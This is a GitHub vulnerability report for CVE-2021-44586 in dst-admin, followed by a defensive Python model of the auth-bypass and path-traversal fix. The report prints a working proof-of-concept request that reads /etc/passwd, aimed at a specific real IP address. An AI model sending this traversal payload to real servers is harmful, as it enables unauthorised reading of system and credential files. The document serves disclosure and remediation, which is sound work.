CVE-2021-44586: A security issue · Issue #28 · qinming99/dst-admin
An issue was discovered in dst-admin v1.3.0. The product has an unauthorized arbitrary file download vulnerability that can expose sensitive information.
Hi, guys!
There is a serious security problem in your code.
A few weeks ago, I found a function point in your website's back end that can lead to arbitrary file download.
But it requires an account and password.
However, I found a new way to download any file without authentication.
That means I can download any file without authorization, i.e. without using my account and password.
Here is an example:
Target: http://106.15.186.197:8080
And the HTTP request is:

```http
GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: 106.15.186.197:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

PoC: `/images;/../backup/download?fileName=../../../../../../../../etc/passwd`

Remember to use Burp Suite, not a browser.
Have a nice day!
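The request in the report above combines two things: an `images;/../` prefix that gets the request past the authentication check, and a `../` chain in `fileName` that escapes the backup directory. The Python model below is an added example, not code from dst-admin or from the reporter. It assumes the usual way such a bypass arises: the application allowlists static prefixes such as `/images` by prefix-matching the raw request path, while the servlet container strips `;param` path parameters and resolves `..` before routing, so the request reaches `/backup/download` unauthenticated. `PUBLIC_PREFIXES`, `BACKUP_DIR`, the function names and the sample file names are hypothetical; the issue does not show the application's own code.

```python
"""Added example (not dst-admin's code): why '/images;/../backup/download'
can slip past a prefix allowlist, and how to check both the route and the
fileName parameter safely.

Assumption (not stated in the issue): the app compares PUBLIC_PREFIXES
against the raw path, while the container strips ';param' segments and
resolves '..' before dispatching to the controller.
"""
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical allowlist of paths that need no login.
PUBLIC_PREFIXES = ("/images", "/css", "/js", "/login")

# Hypothetical directory that /backup/download serves files from.
BACKUP_DIR = "/opt/dst-admin/backup"

# Request-target taken from the PoC in the issue.
POC_TARGET = "/images;/../backup/download?fileName=../../../../../../../../etc/passwd"


def naive_is_public(raw_target: str) -> bool:
    """Vulnerable check: prefix match on the raw path.
    '/images;/../backup/download' starts with '/images', so it is treated as public."""
    return urlsplit(raw_target).path.startswith(PUBLIC_PREFIXES)


def canonical_path(raw_target: str) -> str:
    """Reduce the path the way the container does before routing:
    percent-decode, drop ';param' from every segment, resolve '.' and '..'."""
    path = unquote(urlsplit(raw_target).path) or "/"
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    norm = posixpath.normpath("/".join(segments))
    return norm if norm.startswith("/") else "/" + norm


def hardened_is_public(raw_target: str) -> bool:
    """Match the allowlist against the canonical path, aligned on segment boundaries
    so '/imagesx' does not match '/images'."""
    path = canonical_path(raw_target)
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)


def safe_join(base_dir: str, file_name: str) -> str:
    """Resolve file_name under base_dir and refuse anything that escapes it,
    whether via '../' chains or an absolute path."""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, file_name))
    if target != base and not target.startswith(base + "/"):
        raise PermissionError(f"path traversal rejected: {file_name!r}")
    return target


def handle_download(raw_target: str, authenticated: bool = False) -> str:
    """Hardened handling: require login unless the canonical path is public,
    then confine fileName to BACKUP_DIR. Returns a status string for the demo."""
    path = canonical_path(raw_target)
    if not (authenticated or hardened_is_public(raw_target)):
        return "401 authentication required"
    if path == "/backup/download":
        file_name = parse_qs(urlsplit(raw_target).query).get("fileName", [""])[0]
        try:
            return "200 " + safe_join(BACKUP_DIR, file_name)
        except PermissionError:
            return "400 invalid fileName"
    return "404 not found"


if __name__ == "__main__":
    print("naive check treats PoC as public:", naive_is_public(POC_TARGET))
    print("canonical path of PoC:", canonical_path(POC_TARGET))
    print("hardened check treats PoC as public:", hardened_is_public(POC_TARGET))
    print("unauthenticated PoC:", handle_download(POC_TARGET))
    print("authenticated PoC:", handle_download(POC_TARGET, authenticated=True))
    print("legit download:", handle_download("/backup/download?fileName=world.tar", authenticated=True))
```

The two fixes are independent and both are needed: canonicalising before the allowlist check closes the authentication bypass, and `safe_join` stops an authenticated user from reading `/etc/passwd` through `fileName`.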